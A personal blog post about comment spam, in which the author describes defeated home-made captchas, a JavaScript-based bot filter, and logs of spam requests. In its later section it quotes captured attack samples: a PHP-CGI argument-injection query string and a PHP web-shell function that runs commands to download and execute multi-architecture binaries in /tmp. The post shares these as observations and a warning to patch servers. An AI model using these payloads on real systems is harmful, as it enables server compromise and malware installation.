Year of the spam

At Google, they say they don't need Captcha anymore. If I had an iframe on virtually every website on the web, I could probably claim the same. I assume that if this is a factor in the method they use, then Facebook could also claim the same capability.

Google Plus, Facebook like

reCAPTCHA or captcha, is a system for preventing bots (automated scripts) from entering spam on your website. They are usually found in web forms.

For example, when you are adding a comment on an article, you are presented with a little challenge. Simple for humans and hard for bots. This will assure that automated scripts can't send you spam if they can't solve the challenge.

Spam can be one of the most annoying thing on your website. It can even be harmful.

I used to have a website that accepted users comments. When it was still new I monitored my comments and deleted spam regularly.

When I got a few users, I stopped monitoring. I built a small image generator to protect myself from spam, and forgot about it.

Six months later I received alert from Google Webmaster Tools. My home brewed captcha had been defeated. My website became a highly potent concentration of porn, viagra, and child porn key words.

In panic, I blocked all new comments. I couldn't just filter the comments that were spam so I deleted six month worth of entries.

I modified my image generator, added a little more complexity to fight those bots. To my surprise, it took less than a minute for it too to be defeated. So naturally, comments were disabled for good.

When I started this blog, I didn't think twice about comments. I went straight to a third party system: Disqus. I'm an programmer however. So in time, I decided to reinvent the wheel with my own commenting system.

One thing that most bots don't do, is run JavaScript. Simply making the comments require JavaScript to submit filtered out a large batch of spam bots. For those too tricky for me, I setup an easy switch to move any post back to Disqus.

Now that most if not all spam is blocked, it would be a shame to just let them go to waste. So since January of 2014, I have been saving every spam entry for further studies. I am shocked from all the data I gathered.

No, I don't mark any comment I disagree with as spam. I log all the POST request that are sent to fake links I generated. So far, I have:

The URLs are simple md5 hashes made from some of the post information. You can download them below if you want a nice little IP black list.

Download File

This is by no mean a full protection against spammers, captcha would work better. But it is interesting to note that most bots fail a simple JavaScript test.

Some spammers, who are real people try to sneak in some stuff manually. But those are easier to handle because they can only do so much.

I go through the trouble of approving the comment before it becoming permanent. And once I mark it as spam, the IP address is automatically flagged in the future.

What's in the data I collected.

You can download the list of data in SQL format below. So I won't be talking about all the viagra and cialis here. What interested me the most is the other data that also came along.

Download File

Here is one example:


After unescaping it unescape(urlstring) this is what you get:

/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

There is a variation of this found in the list of requests. They target bugs in different versions of PHP, Wordpress, and many other frameworks.

Other ones came with more familiar data:

$disablefunc_] =>  @ini_get("disable_functions");
if (!empty($disablefunc))
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
 return $result;
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp;chmod  x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp;chmod  x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp;chmod  x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp;chmod  x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp;chmod  x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp;chmod  x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp;chmod  x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp;chmod  x /tmp/sig");

I did very little tests and accessing the ip address times out when you request through the browser. I will spend more time with it later.

This is why you have to make sure your server and applications are always up to date. These scripts go around the web testing old bugs on random servers.

There is something to learn here.


There are no comments added yet.

Let's hear your thoughts

For my eyes only